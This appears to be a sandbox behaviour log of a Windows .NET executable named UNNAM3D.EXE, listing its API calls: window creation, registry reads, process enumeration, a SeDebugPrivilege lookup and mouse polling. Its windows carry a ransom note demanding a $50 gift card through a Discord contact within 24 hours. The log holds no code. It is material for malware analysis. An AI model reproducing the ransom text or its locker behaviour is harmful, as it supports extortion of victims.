Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x75c60000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x76ff25dd True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgJITDebugLaunchSetting, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework, value_name = DbgManagedDebugger, type = REG_NONE False 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 85788894 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 9
Fn
Module Load module_name = RichEd20.DLL, base_address = 0x72f80000 True 1
Fn
Module Get Filename module_name = RichEd20.DLL, process_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, file_name_orig = C:\Windows\system32\RichEd20.DLL, size = 260 True 1
Fn
File Get Info filename = C:\Windows\system32\RichEd20.DLL, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 2
Fn
Environment Get Environment String name = UKKED False 4
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create window_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, class_name = .NET-BroadcastEventWindow.4.0.0.0.141b42a.0, wndproc_parameter = 0 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 4
Fn
Environment Get Environment String name = UKKED False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE.config, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 6
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute window_name = TimerNativeWindow, class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 85789094 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 2
Fn
Environment Get Environment String name = UKKED False 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 21
Fn
System Get Cursor x_out = 1232, y_out = 631 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 1
Fn
System Get Cursor x_out = 1232, y_out = 631 True 1
Fn
Module Get Handle module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x737b0000 True 30
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
System Get Cursor x_out = 1232, y_out = 631 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 85789822 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.0.app.0.141b42a_r14_ad1, index = -4, new_long = 85789862 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 65888 False 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -8, new_long = 65888 True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
System Get Cursor x_out = 1232, y_out = 631 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -16, new_long = 33619968 True 1
Fn
Window Set Attribute window_name = UNNAM3D, class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -20, new_long = 65536 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 1928863994 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -4, new_long = 85789942 True 1
Fn
Window Set Attribute class_name = WindowsForms10.RichEdit20W.app.0.141b42a_r14_ad1, index = -12, new_long = 65894 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 2
Fn
Window Create window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85791366 True 1
Fn
Window Set Attribute window_name = Locked Files, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65896 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 85791406 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 65898 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85791446 True 1
Fn
Window Set Attribute window_name = CREATER: UNNAM3D, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65900 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85791486 True 1
Fn
Window Set Attribute window_name = Discord: UNNAM3D#6666, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65902 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834638 True 1
Fn
Window Set Attribute window_name = You will need to send an message to the below discord with a $50 amazon giftcard code. Then you will shortley get an message back with a password to unlock your files., class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65904 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834702 True 1
Fn
Window Set Attribute window_name = All your personal files have been locked and you need to pay a ransom to get them back. You will have 24 hours to pay or the password will be deleted of our servers making it impossible to get your files back. , class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65906 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834742 True 1
Fn
Window Set Attribute window_name = How do i pay?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65908 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834782 True 1
Fn
Window Set Attribute window_name = What Happend?, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65910 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 1929492681 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -4, new_long = 85834822 True 1
Fn
Window Set Attribute window_name = -YOUR FILES HAVE BEEN LOCKED-, class_name = WindowsForms10.STATIC.app.0.141b42a_r14_ad1, index = -12, new_long = 65912 False 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\users\whuoxysd\appdata\local\temp\unnam3d.exe, base_address = 0x290000 True 1
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 1996432861 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -4, new_long = 85834862 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.141b42a_r14_ad1, index = -12, new_long = 65914 False 1
Fn
Environment Get Environment String name = UKKED False 3
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\UNNAM3D.EXE, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Wallpaper.png, type = file_attributes True 1
Fn
System Sleep duration = 2000 milliseconds (2.000 seconds) True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
Module Get Handle module_name = c:\windows\microsoft.net\assembly\gac_msil\system.windows.forms\v4.0_4.0.0.0__b77a5c561934e089\system.windows.forms.dll, base_address = 0x73000000 True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment Get Environment String name = UKKED False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 13
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 3
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 7
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 3
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 3
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 2
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_LBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_RBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_MBUTTON, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 1
Fn
Keyboard Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 4
Fn
